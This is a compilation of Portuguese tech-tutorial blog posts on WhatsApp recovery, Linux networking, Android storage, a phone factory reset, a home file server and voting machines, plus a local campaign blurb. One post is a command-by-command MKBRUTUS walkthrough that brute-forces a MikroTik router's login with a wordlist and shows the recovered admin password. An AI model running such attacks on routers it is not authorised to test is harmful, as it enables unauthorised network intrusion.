WhatsApp: como recuperar mensagens apagadas em seu Android

WhatsApp é um dos mensageiros mais populares da atualidade, e serviços dedicados à troca de conversas geralmente contam com mecanismos que permitem a exclusão de diálogos para proteção da privacidade. No entanto, e se for preciso restaurar dados apagados? A verdade é que o WhatsApp possui restrições quanto à sua capacidade de recuperação de mensagens.Mas o drama de quem precisa resgatar o que foi dito e então excluído através do WhatsApp está prestes a acabar. É que um gerenciador de dados promete recuperar mensagens que foram apagadas. Vale notar, porém, que a execução dos passos descritos a seguir pode não restaurar todo o seu bate-papo.Durante nossos testes, as mensagens foram devidamente recuperadas. Assim, se você realmente precisa resgatar aquela mensagem deletada, seguir as dicas a seguir pode ser uma das suas melhores opções. Atenção: para que os textos possam ser recuperados, o WhatsApp deverá ser desinstalado. Portanto, certifique-se de fazer seus backups, e mãos à obra.

Passo 1 – Desinstale o app

Se sua mensagem foi trocada no período de até 24 horas, basta desinstalar e instalar novamente o aplicativo. Durante o processo de reinstalação, uma mensagem vai sugerir a restauração de mensagens. Basta tocar em “Recuperar” e pronto: nenhum app alternativo terá de ser instalado. Porém, se a conversa a ser resgatada aconteceu há mais tempo, um gerenciador de arquivos precisa ser baixado via Google Play, e seu WhatsApp deverá ser desinstalado.

Passo 2 – Instale o Gerenciador de Arquivos

O Gerenciador de Arquivos (ou Clean File Manager) é, justamente, um software que permite acesso às pastas de dados do sistema Android – outra opção de gerenciador de arquivos é o Web PC Suite, que precisa ser operado por meio de um computador.Uma vez desinstalado o WhatsApp e baixado o Gerenciador de Arquivos (clique aqui), o local de armazenamento de dados de seu Android deverá ser acessado.
Abra o aplicativo e selecione “Memória do sistema” ou “Memória interna” – em nosso caso, a segunda opção foi marcada. Vá até a pasta “WhatsApp” e, em seguida, toque sobre “Databases” – este é o local em que as mensagens trocadas ficam armazenadas.

Passo 3 – Altere o nome dos arquivos

Os arquivos hospedados na pasta “Databases” correspondem às suas conversas. Porém, para que a restauração possa ser feita, os registros terão de ser renomeados. Acontece que cada um deles possui uma data – veja o exemplo abaixo, com as datas do mês de janeiro.

Em vermelho, os arquivos de conversas passadas; em azul, a conversa atual, que pode ser renomeada (em nosso caso, complementamos com “hoje”).
O truque está aqui: no momento em que você instalar novamente o WhatsApp, a restauração de conversas será sugerida. Acontece que apenas o arquivo do dia pode ser resgatado, e o documento sem data na pasta “Databases” é que corresponde à sua conversa atual. Para que você não perca seu backup, sugerimos a renomeação do registro – em nosso caso, renomeamos o documento para “hoje”.
Mas como recuperar as conversas de, por exemplo, nove dias atrás? Selecione o arquivo na pasta “Databases” de um dia determinado e, então, remova os números que indicam a data. Esse processo fará com que o WhatsApp identifique a conversa editada como sendo a mais recente.

Remova os números da data e faça com que o WhatsApp “pense” que a sua conversa atual é aquela que foi deletada.

Passo 4 – Reinstale o WhatsApp

Baixe novamente o e WhatsApp, durante a instalação, selecione a opção “Recuperar”. O aplicativo vai resgatar sua conversa mais recente, indicada pelo arquivo editado como o descrito pelo passo anterior.
Seus diálogos atuais podem ser consultados também através do app Gerenciador de Arquivos – em nosso exemplo, a palavra “hoje” foi inserida junto do nome do arquivo correspondente às mensagens do dia (ver passo anterior).

Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista

Mr Claytonet 20666

Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista
http;//mrclaytonet.vereador.site
Pelo progresso de nossa cidade chega de ser ultrapassado por outras cidades mineiras em desenvolvimento, chega de atraso. Sou Barbacenense a vida toda e nunca vejo nossa cidade progredir ta na hora de ter alguem que realmente não tem medo de lutar pelo progresso e o povo na camara municipal de Barbacena essa pessoa sou eu Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista.
http://mrclaytonet.vereador.site
Assista este video:https://www.facebook.com/mrclaytonet/videos/1400996586582682/?hc_location=ufi

Porque escolhi o numero 20666?
Por causa do Route 66 MC 🙂

Configurando a rede na linha de comando no ubuntu e no debian

Rede Debian / Ubuntu

Configurar interfaces de rede na mão no ubuntu e debian

Configurando a rede na linha de comando no ubuntu e no debian

Esse tutorial eu vou explicar como você pode configurar a rede no ubuntu todos os sabores (K) (X) (E), e debian todos os sabores. Irei mostrar os principais arquivos de configuração e os principais comandos de rede.

Lembrando que no debian você deve substituir o comando sudo pelo su -c ‘comando dentro das aspas’ .

O linux a sua rede funciona no modo texto, diferente do Windows que é modo gráfico , e sua configuração fica dentro de arquivos texto, no qual você pode manipular esses arquivos de acordo com a sua finalidade, é importante para qualquer usuário de linux saber como se pode configurar uma rede em modo texto, pois pode existir situações que só vai existir o modo texto.

Primeiro vamos saber os principais Arquivos da rede.

Todos os principais arquivos de configuração do Linux fica dentro do diretório /etc .

O arquivo resolv.conf , esse arquivo fica o endereço de IP do seu servidor de DNS .É bom se ter um bom servidor de DNS pois quando você usa um servidor ruim sua rede pode ficar Lenta , você pode encontrar no site do abusar alguns endereços de servidores http://www.abusar.org/dns.html . No meu caso estou usando um servidor de DNS local na minha rede.

/etc/resolv.conf seu conteúdo nameserver 192.168.254.40

O arquivo hosts , fica a informação do nome da sua máquina e você pode colocar um nome de uma máquina dentro da sua rede que você pode criar um apelido para ela , e acessar ela no seu navegado.

/etc/hosts

Conteúdo

127.0.0.1 localhost
127.0.1.1 x.com julio-not
192.168.254.40 x.com http://www.x.com

# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts

O arquivo interfaces fica dentro do diretório /etc/network, esse arquivo armazena a configuração das suas interfaces de rede, nele você manipula a forma que sua rede se comporta , você pode escolher em deixar sua interface como dhcp ou como ip stático , e também pode criar ip alias . “IP alias é uma apelido que você pode dar a sua interface de rede na qual você pode atribuir outros endereços de rede, você pode criar quantos ip alias desejar”.

/etc/network/interfaces

O conteúdo do meu arquivo.

auto lo
iface lo inet loopback
address 127.0.0.1
netmask 255.0.0.0

iface eth0 inet static
address 192.168.254.55
net 192.168.254.0
netmask 255.255.255.0
gateway 192.168.254.254

Os principais comandos de rede são:

ifconfig , ifup, ifdown, route, iwconfig , dhclient.

Usando o dhclient para pegar ip por dhcp.

sudo dhclient eth0

Atribuindo um endereço de ip a uma interface de rede usando ifconfig .

sudo ifconfig eth0 192.168.254.50 netmask 255.255.255.0

Atribuindo um ip alias a uma interface de rede usando ifconfig, no lugar do 1 você pode colocar qualquer nome ou numero.

sudo ifconfig eth0:1 192.168.0.30 netmask 255.255.255.0

Listando as interfaces existentes usando ifconfig .

sudo ifconfig

Derrubando uma interface usando ifconfig.

sudo ifconfig eth0 down .

levantando uma interface usando ifconfig.

sudo ifconfig eth0 up .

Agora usando o ifup e ifdown.

Derrubar todas as interfaces e seus endereços de ip.

sudo ifdown -a

Levantando todas as redes de acordo com os dados do arquivo /etc/network/interfaces

sudo ifup -a .

Agora usando o comando route. O comando route define a rota ou a interface padrão da sua placa de rede.

Para saber as rotas existentes na sua maquina use esse comando.

netstat -r

Atribuindo o gateway padrão da sua rede usando o comando route .

sudo route add default gw 192.168.254.254

Atribuindo uma interface como padrão.

sudo route add default ppp0

Agora vamos configurar a nossa rede usando o arquivo /etc/network/interfaces

Configurando a rede como DHCP padrão na interface eth0 .

sudo nano /etc/network/interfaces

coloque

auto eth0
iface eth0 inet dhcp

Configurando a interface eth0 com ip estático.

sudo nano /etc/network/interfaces

#coloque de acordo com sua rede.
auto eth0
iface eth0 inet static
address 192.168.254.55
net 192.168.254.0
netmask 255.255.255.0
gateway 192.168.254.254

Configurando sua rede como ip alias estático .

sudo nano /etc/network/interfaces

#coloque de acordo com sua rede.
auto eth0:1
iface eth0:1 inet static
address 192.168.0.55
net 192.168.0.0
netmask 255.255.255.0
gateway 192.168.254.254

Depois de configurar o arquivo derrube as interfaces.

sudo ifdown -a

Depois levante .

sudo ifup -a

Para reniciar a sua configuração de rede existe esse comando.

sudo /etc/init.d/networking restart

Como instalar ou mover aplicativos para o cartão SD no Android 2.2 Froyo

 O sistema operacional Android, até a versão 2.1 (Eclair), permitia apenas a instalação de novos aplicativos diretamente na memória interna do aparelho, o que se tornou um ponto negativo nos telefones com pouco espaço de armazenamento (além de afetar o processamento geral). Se você tem um Android com 160Mb de memória interna sabe do que estamos falando.
Eis então que a Google lançou a versão do 2.2 do Android (Froyo), trazendo uma das funcionalidades mais esperadas – a possibilidade de instalar aplicativos diretamente no cartão SD.
Contudo, muitos usuários ainda têm dúvidas de como usar esse recurso. Primeiro porque não é uma funcionalidade simples de se acessar e, segundo, por essa opção não funcionar para todos os apps, já que alguns deles não possuem, em sua configuração nativa, a possibilidade de rodar pelo cartão SD.
Para seus aplicativos já instalados no Android, existe a opção de movê-los manualmente para o cartão SD. Entretanto, é preciso ficar atento a aplicativos que não funcionam bem no cartão de memória, como os que possuem widget’s, ou os que rodam em background (Gmail, Facebook, Twitter, entre outros). Esses aplicativos, quando movidos ou instalados no cartão SD, podem demorar um pouco mais na sua inicialização, tendo visto que é preciso um tempo para o sistema ler o cartão de memória.
Para isso, o TechTudo trouxe pra você a solução: uma forma de forçar a instalação de qualquer app no cartão SD, de maneira segura. Siga os passos abaixo:
Aprendendo a mover seus apps
Passo 1. Clique no Menu de seu smartphone e acesse “Configurações”. Em seguida, clique em “Aplicações”, depois em “Gerenciar aplicações”. Escolha o aplicativo que deseja mover e clique em “Mover para cartão SD”. Pronto o aplicativo será movido;
Passo 2. Caso queira mover o aplicativo de volta para o telefone, repita o passo 1, mas, no lugar de clicar em “Mover para cartão SD”, clique em “Mover para telefone”;
Aprendendo a instalar seus aplicativos diretamente no cartão SD
Passo 3. Alguns apps não possuem a opção “Mover para SD” disponível. Para resolver este problema, instale no seu computador o Android SDK . Clique na opção “Recommended”, faça o download e depois instale o SDK. Caso seja necessário instalar o JAVA SE, faça-o;
Passo 4. No seu smartphone, clique no Menu e acesse “Configurações”. Em seguida, clique em “Aplicações”, depois em “Desenvolvimento”. Para ativar o modo depuração USB, marque a opção “Depuração USB” e confirme, clicando em “OK”;
Passo 5. No computador, após instalado o arquivo, localize o caminho de instalação, que normalmente é no diretório C:\Program Files\Android\android-sdk
Passo 6. Após localizar o caminho, clique com o botão direito do mouse sobre a pasta “platform-tools”. Pressione a tecla “Shift” e clique em “Abrir janela de comando aqui”. Ou, de uma forma mais simples, clique no “Menu Iniciar”, depois em “Executar”. Digite cmd e clique “Enter”. Em seguida, digite:
CD C:\Program Files\Android\android-sdk\platform-tools
…e clique em “Enter”;
Passo 7. A janela de prompt de comando do Windows iniciará na pasta “Platform-tools”. Em seguida, digite abd.exe e clique “Enter”;
Passo 8. Na mesma tela de comando, digite adb Shell e clique “Enter”;
Ativando instalação automatica no cartão (Foto: Divulgação)Ativando instalação automática no cartãoPasso 9. Para dar continuidade ao processo e habilitar a instalação de novos aplicativos no cartão de memória, abaixo de “daemon started successfully”, digite:
pm setInstallLocation 2
…e clique novamente em ”Enter”;
Passo 10. Pronto! Todos os novos aplicativos que você instalar no Android serão armazenados no cartão SD. Para mover os aplicativos anteriormente instalados, repita o passo 1. Caso esta opção continue indisponível, é preciso desinstalar, e depois instalá-lo novamente. O aplicativo automaticamente será instalado no cartão SD.
Desinstalando a funcionalidade
Passo 11. Caso perceba que algum aplicativo não esteja funcionando bem no cartão de memória, basta voltar ao padrão. Para isso, acesse a opção “Gerenciar aplicativos”, nas configurações do seu smartphone. Escolha o aplicativo que você deseja que volte ao padrão e clique em “Mover para memória”. E pronto! O aplicativo será movido;
Passo 12. Mas se você quiser tornar a instalar seus aplicativos na memória do aparelho com o Android SDK instalado no seu computador, repita os passos 3, 4, 5, 6 e 7;
Passo 13. Em seguida, abaixo de “daemon started successfully”, digite:
pm setInstallLocation 0
…e clique novamente em “Enter” para desabilitar a instalação de novos aplicativos no cartão de memória.
A opção de instalar ou mover aplicativos diretamente para o cartão SD funciona perfeitamente em aplicativos de jogos, como Angry Birds, por exemplo, ou em aplicativos de gerenciamento de tarefas, entre outros que não rodam em background.

Link2Sd – Transfira seus Apps para o cartão de memória

Uma das restrições que encontramos em nossos X10 Mini Pro é a pouca quantidade de memória interna. Instalamos alguns apps e pronto! A memória está cheia. Para contornarmos isso existe a opção de instalação dos apps diretamente no cartão SD, coisa que o Android 2.2 (Froyo) já faz por Default. Confesso que um dos motivos que me fez fazer root no meu mini pro foi justamente a intenção de contornar este problema, no entanto, após rotear o celular notei que para usar o app App2Sd teria que fazer uma série de modificações como instalar uma nova Rom, atualizar o OS, limpar todo conteúdo do cartão de memória, utilizar comandos via ADB e outras modificações que demandariam muito trabalho e riscos. Segue aqui um pequeno tutorial de como fazer este procedimento usando o Aplicativo chamado Link2SD.

O que o Link2SD faz ?

Como o próprio nome sugere, o aplicativo transfere os apps para o cartão de memória criando um Link no sistema Android. Assim o Android apenas guardará no seu sistema uma referência ao app e não o próprio app, consumindo assim um espaço infinitamente menor na sua memória interna.

O procedimento é arriscado ?

De forma alguma, basta um aparelho rooteado. Não envolve conhecimentos avançados, nem instalação de novas ROM’s

Qual o ganho de memória esperado ?

Imagem Postada

No meu caso estava com alguns poucos e básicos apps instalados no X10 mini pro e o Android já estava acusando “pouca memória interna” coisa que ele faz quando chagamos a apenas 20mb de memória livre. Após a configuração do Link2SD minha memória livre chegou a espantosos 120mb, hoje tenho mais de 200 app instalados (fora os de sistema) e ainda me sobram 63mb de memória livre. Ou seja, compensa e muito.

Vamos a configuração:

1) Primeiramente faça Backup de todo conteúdo do seu cartão SD. Este procedimento é bem símples, basta conectar o celular via USB selecionar “montar cartão SD” no aparelho. Abra o drive do cartão pelo explorer do windows. Vá em “ferramentas” “opções de pastas” “modo de exibição” e selecione “mostrar pastas e arquivos ocultos” agora crie uma pasta no seu Desktop e copie todo conteúdo do cartão de memória para a mesma. Feito isso, pode desmontar o cartão SD e desconectar o Cel.

2)Formatando e particionando o cartão de memória.

A) Precisamos agora criar uma nova partição em nosso cartão SD e para isso utilizaremos o programa MiniTool Partition Wizard 5.2. Baixe o programa e instale no seu PC / Notebbok.

B-) No seu celular você deve entrar em “configurações” “aplicativos” “desenvolvimento” selecione as opções “Depuração USB” e “Permitir locais Fictícios” Agora pode conectar o cel. novamente no PC e montar o cartão SD.

C) Feito isso vamos agora trabalhar com o MiniTool Partition Wizard (você pode encontrar o programa “free” facilmente pela net)

Abra o MiniTool, deve aparecer a imagem seguinte:

C1) Disk 2 representa o seu cartão de memória, nós vamos deletar esta partição e criar duas novas. (desconsidere o tamanho das partições mostradas nas imagens pois servem apenas a título de exemplo)

Imagem Postada

C2) Agora clique com o botão direito do mouse na parte cinza “unallocated” e crie uma nova partição

Imagem Postada

C3) Escolha as opções Primary e FAT32, com o mouse escolha o tamanho da partição. o que sobrar irá ser a partição do Link2SD. Ou seja, neste passo o tamanho da partição vai variar de acordo com o tamanho do seu cartão de memória. Notem na minha primeira imagem (qual o ganho de memória esperado?) que como possuo o cartão original que acompanha o cel. 4Gb formatei da seguinte maneira. SD Card 3.18Gb deixando o restante para a segunda partição, no meu caso, Sd card 2nd pat 501Mb.

Imagem Postada

C4) Agora vamos criar outra nova partição, no caso uma partição Ext2. Clique com o direito novamente em “Unallocated” e clique em create.

Imagem Postada

C5) Agora escolha Primary e Ext2, essa será a partição do Link2Sd. No meu caso criei uma partição com 501Mb que foi o espaço sobrado no meu cartão SD.

Imagem Postada

C6) Por fim clique em Aplly no canto esquerdo superior.

Imagem Postada

C7) Agora desmonte o cartão SD, desconecte o celular e reinicie o mesmo (não esqueça, tem que reiniciar o cel).

2) Trabalhando com o Link2SD

Imagem Postada

2-1) Na tela inicial do aplicativo entre nas configurações e selecione “Filter”

Imagem Postada

2-2) Selecionando como na imagem a seguir o app apresentará uma lista de todos os apps instalados no seu cel com exceção dos apps do sistema.

Imagem Postada

2-3) Clicando em qualquer app listado deve aparecer a imagem seguinte. Você deve clicar em “Create Link” e a partir daí, caso apareçam outras mensagens é só ir dando ok.

Imagem Postada

2-4) Refaça novamente o procedimento para ir passando outros apps para o cartão de memória.

2-5) Depois de terminado o procedimento você deve clicar em “Storage Info” para visualizar como ficaram distribuídos os seus apps dentro do cartão e memória interna do Cel.

Imagem Postada

2-6) Agora você tem que reiniciar o Cel. caso contrário os seus apps não vão aparecer na sua lista de app padrão do seu Android. Caso você esteja usando apps que utilizam Widget, provavelmente você terá que adicioná-los novamente na sua tela inicial.

Está pronto! Agora você tem bastante espaço livre para instalar o que quiser. Lembre-se que a medida que for instalando novos app você terá que fazer o procedimento novamente para direcionar o novo app para o cartão de memória. Espero que tenha ajudado a todos.

Hard Reset no Novo Moto G 1ª e 2ª geração (Todos os modelos) com Android L / 5.0 / Lollipop

 Veja nesse tutorial como você o Hard Reset no seu Motorola Moto G estando com a versão de Android 5.0 ou superior ou seja o Android Lollipop. Esse procedimento seve para voltar o aparelho aos padrões de fábrica, sendo bastante utilizado quando se esquece a senha do aparelho, ou seja, para desbloquear o aparelho no caso de esquecimento de senhas. Também para corrigir alguns pequenos problemas de funcionamento do aparelho.

Passo a passo
Com o aparelho desligado e de preferência sem o chip, faça o seguinte
  • Segure a tecla de Volume- juntamente com a tecla Power (Liga/Desliga) por volta de 3 segundos e solte ambos os botões
  • Com a tecla de Volume desça até a opção Recovery e o selecione com a tecla de Volume+
  • O celular irá reiniciar e irá aparecer o bonequinho da Android deitado
  • Segure a tecla de Power e dê um toque na Tecla de Volume+ e solte os botões
  • Com a tecla de Volume- desça até a opção wipe data/factory reset e o selecione com a tecla Power
  • Novamente com a tecla de Volume- desça até a opção Yes — delete all user data e o selecione com a tecla Power
  • Aguarde até que o procedimento termine e volte para o menu anterior
  • Voltando ao menu desça com a tecla de Volume- até a opção wipe cache partition e o selecione com a tecla Power
  • Caso o aparelho não reinicie após selecionar a opção wipe cache partition, selecione a opção reboot system now
Pronto! O celular será reiniciado e já com os padrões de fábrica e desbloqueado caso você esteja fazendo o procedimento no caso de esquecimento de senha.
OBS: É normal que ele demore um pouco mais que o normal para ser reiniciado, pois ele voltará aos padrões de fábrica

Como criar seu próprio servidor de arquivos em casa

Guardar seus arquivos de forma segura nunca foi tão fácil. Quem não gosta de armazenar seus dados com métodos tradicionais (pendrives, CDs, DVDs e HDs portáteis) pode muito bem usufruir de uma enorme variedade de serviços de armazenamento na nuvem como Dropbox, Google Drive e SkyDrive.
Contudo, digamos que você quer mais, muito mais. Não quer depender de servidores terceirizados, que podem muito bem apresentar problemas e sumir com seus documentos confidenciais em questão de pouquíssimos minutos. Embora seja pouco provável que os gigantescos datacenters da Microsoft ou da Google apresentem problemas, os mais neuróticos sempre mantêm essa possibilidade em mente.
Sendo assim, que tal montar seu próprio servidor de arquivos? Além de ser fácil e rápido, o procedimento é bastante barato, visto que você pode usar peças de PCs antigos que você não utilize mais (ou comprá-las em lojas de artigos usados). Além de armazenar de forma mais segura e privada os seus dados importantes, você também pode usar seu servidor para hospedar sites (economizando aquela graninha que você gastava no seu host). O Mr Claytonet ensina a você como fazer tudo isso em apenas sete passos simples! Confira.

(Fonte da imagem: Reprodução/Baixando Wallpapers)

1) Monte o hardware
Você se lembra daquele computador antigo que você não usa mais e que está acumulando pó desde o ano passado? Hora de revivê-lo e dar um novo trabalho para o bom velhinho. Caso você seja menos apegado e já tenha se livrado da sua máquina anterior, o jeito é montar um PC especialmente para o servidor adquirindo algumas peças que podem ser facilmente encontradas em lojas de artigos de informática. Dar uma conferida em e-commerces de usados também é uma boa pedida (sim, estamos falando do Mercado Livre). Basicamente, você vai precisar de:
Uma placa-mãe (não precisa ser um modelo muito recente);
Um processador de pelo menos 2 GHz ;
No mínimo 512 MB de memória RAM;
Um disco rígido da quantia que você desejar. Que tal 1 TB?
Fazendo uma rápida pesquisa na internet, é possível realizar uma cotação bastante precisa dos gastos desse servidor. Uma placa-mãe razoável gira em torno de R$ 199; um pente de 512 MB de memória RAM pode ser encontrado facilmente por cerca de R$ 80. Caso esteja com o orçamento apertado, opte por um Intel Celeron (cerca de R$ 100) na hora de comprar o processador. Se estiver com um pouquinho mais de grana para investir, opte por um Intel Dual Core E3300 (entre R$ 149 e R$ 199).
Por fim, chegamos ao item mais importante: o disco rígido. Um bom HD Seagate de 1 TB e 7200 RPM pode ser encontrado por pelo menos R$ 220. Se 500 GBs foram o suficiente para você, basta reservar R$ 150 por um drive da mesma marca. Quanto gastamos ao todo? Cerca de R$ 700.

(Fonte da imagem: Reprodução/Wikimedia)

2) Instale Linux
Não importa se você é um fã da Microsoft e não consegue se desapegar do clássico sistema operacional Windows: é necessário instalar o Linux para fazer seu servidor funcionar corretamente. Recomendamos que opte pelas distribuições Ubuntu ou Xubuntu. Ambas são completamente gratuitas e razoavelmente leves, não ocupando muito espaço em seu precioso disco rígido.
Instale a ISO gravando-a em um CD/DVD ou através de um pendrive bootável – clique aqui para aprender como fazê-lo, caso ainda não saiba. Importante: para os próximos passos deste tutorial, considere que utilizamos o Ubuntu 12.04 (um dos mais populares) para descrever as ações que você fará. Instalamos o SO em português.

(Fonte da imagem: Reprodução/HiTrend)

3) Limpe o sistema operacional
Qualquer distro Linux vem repleta de softwares adicionais que devem ser desinstalados antes que você prossiga. Utilize o Synaptic (gerenciador de pacotes também incluso nas distribuições) para desinstalar programas como AbiWord, OpenOffice/LibreOffice, Thunderbird, Gaim, GIMP, Firefox, Rhythmbox etc.
Em seguida, cheque se o sistema operacional não possui atualizações disponíveis. Se houver, baixe e instale todas por questões de segurança, garantindo a estabilidade do seu servidor. Por fim, desative o bloqueio de tela (através do menu Configurações do sistema > Brilho e bloqueio).
4) Configure o compartilhamento de arquivos
Tudo pronto, hora de iniciar as configurações e todo o trabalho pesado. Antes de tudo, instale o Samba, o programa que fará seu computador atuar como servidor e permitir o compartilhamento de arquivos em rede. Você pode consegui-lo através do próprio Synaptic (pesquisando novas aplicações e marcando-o para instalação) ou pela Central de Programas do Ubuntu. O app também está disponível no Baixaki.

(Fonte da imagem: Reprodução/iMasters)

Abra o terminal (Painel de controle > Terminal ou hotkey Ctrl+Alt+T) e digite sudo su para entrar no modo root. Será necessário reinserir a sua senha. Entre no diretório de instalação do Samba digitando cd /etc/samba. Escreva nano smb.conf e aperte Enter para iniciar o processo de configuração.
Apague todo o texto do documento (segure as teclas Ctrl+K até deletar tudo) e cole/digite o texto que pode ser encontrado neste link (substituindo “Name” e “Server Name” com o nome de usuário e nome da máquina). Salve o documento (Ctrl+O) e feche-o (Ctrl+X). É necessário especificar uma senha para acessar o Samba; para isto, digite o comando sudo smbpasswd -a. Por fim, reinicie os processos do programa, escrevendo sudo restart smbd e sudo restart nmbd.


5) Adicionando capacidade FTP
Abra o terminal outra vez (novamente: Painel de controle > Terminal ou hotkey Ctrl+Alt+T) e ganhe acesso root de novo (digitando sudo su e inserindo sua senha do SO). Escreva o comando sudo apt-get install proftpd para instalar o software ProFTPD. Quando você for questionado sobre o tipo de servidor que deseja configurar, escolha a opção “Standalone”.
Mude para o diretório de instalação com a mensagem cd /etc/proftpd/. Configure-o digitando o comando sudo nano /etc/proftpd/proftpd.conf. Substitua todo o conteúdo do arquivo que se abre pelo código que pode ser encontrado neste link.
Salve as configurações (Ctrl+O e em seguida Ctrl+X) e reinicie o servidor, inserindo o comando /etc/init.d/proftpd restart.


6) Configure o acesso Shell (SSH)
Ainda no terminal e em modo root, instale o OpenSSH (apt-get install openssh-server) e o VNC Server (sudo apt-get install vnc4server). Configure uma senha para este último aplicativo (digite vncpasswd e insira duas vezes uma senha de 6 caracteres). Crie um comando de login personalizado digitando sudo nano /usr/local/bin/sharex11vnc. Um novo arquivo será aberto e você deve colar/digitar o seguinte conteúdo dentro dele:
#!/bin/sh
x11vnc -nap -bg -many -rfbauth ~/.vnc/passwd -desktop “VNC ${USER}@${HOSTNAME}” \
|grep -Eo “[0-9]{4}”>~/.vnc/port
Calma, ainda não acabou! Defina os direitos do usuário através do comando sudo chmod 755 /usr/local/bin/sharex11vnc. Feche o terminal e permita que o script do VNC Server recém-criado seja iniciado junto ao Linux: percorra o caminho Painel de Controle > Aplicativos de Sessão e clique no botão “Adicionar”. Escreva sharex11vnc nos dois primeiros campos da janela que se abre e dê um “Ok”.
Por fim, ative o login automático de sua conta no Ubuntu (percorrendo o caminho Aplicações > Configurações > Contas de Usuário e marcando a caixa de seleção “Iniciar sessão automaticamente”).


7) Divirta-se!
Finalmente, seu servidor está pronto, com todos os softwares configurados e login automático ativado! Retire todos os componentes inúteis da máquina (mouse, teclado, monitor e até mesmo o leitor/gravador de CD e DVD) e plugue o cabo de internet (não é recomendado utilizar conexão WiFi).
Para se conectar ao seu servidor, você pode usar diversos programas como o PuTTy ou o FileZilla. Na maioria das vezes, tudo o que você precisa fazer é definir o endereço IP do servidor (você deve conferir essa informação antes a partir do PC com Linux), informar a porta (5900) e o destino (localhost:5900).
Lembre-se também de que você pode instalar complementos à vontade de acordo com sua necessidade, como TorrentFlux, Apache, MySQL e phpMyAdmin.

FONTE(S): INTAC

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

BRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Veja o ataque na pratica:
01 Passo

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Verifique a versão atual do python em seguida realiza a instalação da versão 3

root@kali:~# python –version (Exibe a versão do Python)

root@kali:~# apt-get install python3 (Realiza a instalação do Python 3)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

02 Passo

Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.

root@kali:~# python –version (Exibe a versão do Python)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

03 Passo

Realize o download do projeto mkbrutus

root@kali:~# git clone https://github.com/mkbrutusproject/mkbrutus

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

04 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~# chmod -R 755 mkbrutus/

root@kali:~# cd mkbrutus/

root@kali:~/mkbrutus# ls -l

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

05 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~/mkbrutus# python3 mkbrutus.py -h

-h : Help (Ajuda)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

06 Passo

São apresentadas todas as opções que a ferramenta mkbrutus disponibiliza.

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

07 Passo

Crie um arquivo de senhas ou realize o download de uma lista nos sites:

Lista: wiki.skullsecurity.org/Passwords
Lista: wordlist.sourceforge.net

root@kali:~/mkbrutus# cat senhas.txt

 

Conteúdo do arquivo senhas.txt

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

08 Passo

Realize o ataque no equipamento utilizando os seguintes parâmetros.

root@kali:~/mkbrutus# python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt

  • mkbrutus.py : Ferramenta de Brute Force
  • 192.168.0.1 : IP do Roteador MikroTik
  • senhas.txt : Arquivo de Senhas(Wordlist)

O ataque é realizado com sucesso e o usuário e a senha são revelados:

Usuário: admin
Senha: P@ssw0rd

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Desenvolvedores:

Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire
Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa

Projeto: github.com/mkbrutusproject/mkbrutus

Fonte: 100security

A urna eletrônica Brasileira

A urna eletrônica é um microcomputador de uso específico para eleições.

Ela apresenta as seguintes características: resistência, pequenas dimensões, baixo peso, autonomia de energia e recursos de segurança.

Sistema Operacional da urna eletrônica

Até 2006, a urna eletrônica utilizava o sistema operacional VirtuOS e Windows CE que possibilitavam o compartilhamento do processador por diferentes processos que são realizados simultaneamente. Os modelos de urna 1996 a 2000 rodavam o sistema operacional VirtuOS.Os demais modelos de urna: 2002, 2004 e 2006 rodavam o sistema operacional Windows CE.

 

MODELO

 

SISTEMA OPERACIONAL                     PROCESSADOR

UE 96 Virtuos 386- 25MHZ
UE 98 Virtuos Cyrix GX 133
UE 2000 Virtuos Cyrix GX 166
UE 2002 Windows CE Cyrix GX 166
UE 2004 Windows CE Cyrix GX 200
UE 2006 Windows CE Processador 433 Mhz – 128MB DDR

 

A partir das Eleições de 2008, o TSE adotou uma única plataforma, baseada no software livre Linux, que é usado até os dias atuais. Essa troca trouxe três grandes vantagens. A primeira delas é a economia, já que o governo não terá mais que adquirir as licenças dos antigos sistemas proprietários. A segunda vantagem diz respeito à transparência do processo, pois é um mecanismo aberto em que todo código-fonte está disponível ao público e pode ser auditado livremente. E em terceiro lugar, vem a segurança, já que o Linux é um sistema reconhecidamente mais seguro.

Além disso, pode-se destacar que a padronização do uso do software livre Linux, em todos os modelos de urna, traz a vantagem de se gerenciar melhor as contingências durante as Eleições.

 

 Sistema de Segurança e Sistemas Eleitorais

